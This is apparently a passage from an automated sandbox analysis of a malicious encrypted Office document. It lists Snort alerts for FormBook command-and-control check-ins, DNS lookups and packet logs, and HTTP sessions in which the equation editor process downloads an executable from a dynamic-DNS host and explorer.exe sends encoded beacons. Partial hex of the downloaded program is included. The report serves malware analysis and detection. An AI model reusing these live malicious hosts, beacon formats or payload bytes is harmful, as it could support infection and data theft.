                                                                                                                                                                Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                Stream Path: EncryptedPackage, File Type: data, Stream Size: 2569224
                                                                                                                                                                General
                                                                                                                                                                Stream Path:EncryptedPackage
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:2569224
                                                                                                                                                                Entropy:7.99992561194
                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                Data ASCII:. 3 ' . . . . . . . . . 4 ` . . t . . ) . B . . . 7 . . M M n . . " . j . . . . . % Y . . . i . i . . F U r . 0 . v x . . . . M . . . O . D W . . . . E . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . E . . .
                                                                                                                                                                Data Raw:f8 33 27 00 00 00 00 00 19 d5 8b b8 34 60 f9 f9 74 c3 b1 29 c4 42 ed e7 c3 37 a7 a3 4d 4d 6e c3 8f 22 20 1e 6a d8 9a ad aa ed 25 59 a6 fe a1 69 e0 69 b0 be 46 55 72 d7 30 fa 76 78 eb a5 f4 f7 4d e0 0e fc 4f e8 44 57 9d 8e d9 7f 45 ef c9 01 c6 c3 e4 af 08 04 09 05 9d 8e d9 7f 45 ef c9 01 c6 c3 e4 af 08 04 09 05 9d 8e d9 7f 45 ef c9 01 c6 c3 e4 af 08 04 09 05 9d 8e d9 7f 45 ef c9 01
                                                                                                                                                                Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                General
                                                                                                                                                                Stream Path:EncryptionInfo
                                                                                                                                                                File Type:data
                                                                                                                                                                Stream Size:224
                                                                                                                                                                Entropy:4.57282376111
                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . : . $ . ] . v J ] B . . . . ` ~ 7 ^ . . . . . . . Z . . . . . . . . . . . . . . . O . . . . . + . . . . P . . . . . . h . . . c . .
                                                                                                                                                                Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                Network Behavior

                                                                                                                                                                Snort IDS Alerts

                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                01/27/21-07:21:23.988981TCP1201ATTACK-RESPONSES 403 Forbidden804916634.102.136.180192.168.2.22
                                                                                                                                                                01/27/21-07:21:41.083858TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22
                                                                                                                                                                01/27/21-07:21:52.073287TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22103.24.200.168
                                                                                                                                                                01/27/21-07:21:52.073287TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22103.24.200.168
                                                                                                                                                                01/27/21-07:21:52.073287TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22103.24.200.168
                                                                                                                                                                01/27/21-07:21:58.757380ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Jan 27, 2021 07:20:14.647522926 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:14.869549036 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:14.869622946 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:14.869959116 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.092840910 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.092865944 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.092878103 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.092895031 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.093013048 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.093878031 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.313369036 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.313415051 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.313435078 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.313452005 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.313467026 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.313481092 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.313605070 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.313632965 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.314372063 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.314444065 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.314557076 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.314645052 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.534678936 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534708023 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534720898 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534739971 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534753084 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534765005 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534780979 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534796953 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534811974 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534838915 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534849882 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534861088 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.534987926 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.535034895 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.535583019 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.535604954 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.535619974 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.535636902 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.535671949 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.535690069 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.538635015 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.756493092 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756550074 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756587982 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756627083 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756664991 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756712914 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756755114 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756791115 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756810904 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.756829023 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756834030 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.756838083 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.756841898 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.756855011 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.756865978 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756896973 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.756901979 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756923914 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.756939888 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756953955 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.756978989 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.756983042 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757034063 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757035017 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757090092 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757160902 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757219076 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757241011 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757281065 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757294893 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757323980 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757361889 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757420063 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757488012 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757551908 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757559061 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757590055 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757608891 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757627010 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757641077 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757668972 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757673979 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757716894 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757729053 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757754087 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757771015 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757791996 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757797956 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757831097 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757844925 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757868052 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.757872105 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.757920980 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.761199951 CET4916580192.168.2.22103.99.1.149
                                                                                                                                                                Jan 27, 2021 07:20:15.978374004 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.978430033 CET8049165103.99.1.149192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:20:15.978451967 CET8049165103.99.1.149192.168.2.22

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Jan 27, 2021 07:20:14.562747002 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                Jan 27, 2021 07:20:14.628480911 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:21:23.729876041 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                Jan 27, 2021 07:21:23.797782898 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:21:28.994144917 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                Jan 27, 2021 07:21:29.338947058 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:21:40.837837934 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                Jan 27, 2021 07:21:40.899127007 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:21:46.088655949 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                Jan 27, 2021 07:21:46.165880919 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:21:51.705537081 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                Jan 27, 2021 07:21:51.890872002 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:21:57.284590006 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                Jan 27, 2021 07:21:58.284625053 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                Jan 27, 2021 07:21:58.699167967 CET53560098.8.8.8192.168.2.22
                                                                                                                                                                Jan 27, 2021 07:21:58.757286072 CET53560098.8.8.8192.168.2.22

                                                                                                                                                                ICMP Packets

                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                Jan 27, 2021 07:21:58.757380009 CET192.168.2.228.8.8.8d016(Port unreachable)Destination Unreachable

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                Jan 27, 2021 07:20:14.562747002 CET192.168.2.228.8.8.80x3d08Standard query (0)kungsb2sndygotchtsnp.dns.armyA (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:23.729876041 CET192.168.2.228.8.8.80x708cStandard query (0)www.growingequity.fundA (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:28.994144917 CET192.168.2.228.8.8.80xa14dStandard query (0)www.opmania36.comA (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:40.837837934 CET192.168.2.228.8.8.80xccffStandard query (0)www.kerifletcherrock.comA (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:46.088655949 CET192.168.2.228.8.8.80x2e78Standard query (0)www.rentapalla.comA (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:51.705537081 CET192.168.2.228.8.8.80x2f03Standard query (0)www.doxinlabs.comA (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:57.284590006 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.loimtech.comA (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:58.284625053 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.loimtech.comA (IP address)IN (0x0001)

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                Jan 27, 2021 07:20:14.628480911 CET8.8.8.8192.168.2.220x3d08No error (0)kungsb2sndygotchtsnp.dns.army103.99.1.149A (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:23.797782898 CET8.8.8.8192.168.2.220x708cNo error (0)www.growingequity.fundgrowingequity.fundCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:23.797782898 CET8.8.8.8192.168.2.220x708cNo error (0)growingequity.fund34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:29.338947058 CET8.8.8.8192.168.2.220xa14dNo error (0)www.opmania36.com156.240.35.23A (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:40.899127007 CET8.8.8.8192.168.2.220xccffNo error (0)www.kerifletcherrock.comkerifletcherrock.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:40.899127007 CET8.8.8.8192.168.2.220xccffNo error (0)kerifletcherrock.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:46.165880919 CET8.8.8.8192.168.2.220x2e78No error (0)www.rentapalla.com184.72.229.176A (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:51.890872002 CET8.8.8.8192.168.2.220x2f03No error (0)www.doxinlabs.com103.24.200.168A (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:58.699167967 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.loimtech.com106.14.46.68A (IP address)IN (0x0001)
                                                                                                                                                                Jan 27, 2021 07:21:58.757286072 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.loimtech.com106.14.46.68A (IP address)IN (0x0001)

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • kungsb2sndygotchtsnp.dns.army
                                                                                                                                                                • www.growingequity.fund
                                                                                                                                                                • www.opmania36.com
                                                                                                                                                                • www.kerifletcherrock.com
                                                                                                                                                                • www.rentapalla.com
                                                                                                                                                                • www.doxinlabs.com

                                                                                                                                                                HTTP Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                0192.168.2.2249165103.99.1.14980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jan 27, 2021 07:20:14.869959116 CET0OUTGET /kung2doc/winlog.exe HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                Host: kungsb2sndygotchtsnp.dns.army
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Jan 27, 2021 07:20:15.092840910 CET2INHTTP/1.1 200 OK
                                                                                                                                                                Date: Wed, 27 Jan 2021 06:20:11 GMT
                                                                                                                                                                Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34
                                                                                                                                                                Last-Modified: Tue, 26 Jan 2021 23:17:27 GMT
                                                                                                                                                                ETag: "b8000-5b9d5dba8b629"
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 753664
                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 07 a3 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 74 0b 00 00 0a 00 00 00 00 00 00 4a 93 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 92 0b 00 4f 00 00 00 00 a0 0b 00 74 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 73 0b 00 00 20 00 00 00 74 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 74 06 00 00 00 a0 0b 00 00 08 00 00 00 76 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 7e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 93 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 4c da 02 00 e4 70 02 00 03 00 00 00 05 00 00 06 30 4b 05 00 c8 47 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 25 00 00 0a 28 26 00 00 0a 00 de 02 00 dc 00 28 0b 00 00 06 02 6f 27 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 28 00 00 0a 00 02 16 28 29 00 00 0a 00 02 17 28 2a 00 00 0a 00 02 17 28 2b 00 00 0a 00 02 16 28 2c 00 00 0a 00 2a 4e 00 02 28 0d 00 00 06 6f 3f 08 00 06 28 2d 00 00 0a 00 2a 26 00 02 28 2e 00 00 0a 00 2a ce 73 2f 00 00 0a 80 01 00 00 04 73 30 00 00 0a 80 02 00 00 04 73 31 00 00 0a 80 03 00 00 04 73 32 00 00 0a 80 04 00 00 04 73 33 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 34 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 35 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 36 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 37 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 38 00 00 0a 0a 2b 00 06 2a 26 00 02 28 39 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3a 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 06 00 00 02 28 3b 00 00 0a 6f 3c 00 00 0a 73 3d 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`PtJ @ @Ot H.textPs t `.rsrctv@@.reloc~@B,HLp0KG0(%(&(o'*((()(*(+(,*N(o?(-*&(.*s/s0s1s2s3*0~o4+*0~o5+*0~o6+*0~o7+*0~o8+*&(9*0<~(:,!rp(;o<s=~+*0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                1192.168.2.224916634.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jan 27, 2021 07:21:23.848540068 CET796OUTGET /oean/?gnj80=CJBh7xO8zrtpcTq&jvylC6k0=VZAj6Greo+wzdRR3y+9BSoe0Fg1VHX3dphRjh8ChsM9cVC7/tTrq8181uuZfup+KvkP/wA== HTTP/1.1
                                                                                                                                                                Host: www.growingequity.fund
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Jan 27, 2021 07:21:23.988981009 CET796INHTTP/1.1 403 Forbidden
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 27 Jan 2021 06:21:23 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 275
                                                                                                                                                                ETag: "600b4d2d-113"
                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                2192.168.2.2249167156.240.35.2380C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jan 27, 2021 07:21:29.762418032 CET797OUTGET /oean/?jvylC6k0=f3eeGK1+0gCIvCWlFxxcFkAkVp6uwJz7C95spmYKsMNPFPV4KfhW/w3yTMrsoyUuOs+/YQ==&gnj80=CJBh7xO8zrtpcTq HTTP/1.1
                                                                                                                                                                Host: www.opmania36.com
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                3192.168.2.224916834.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
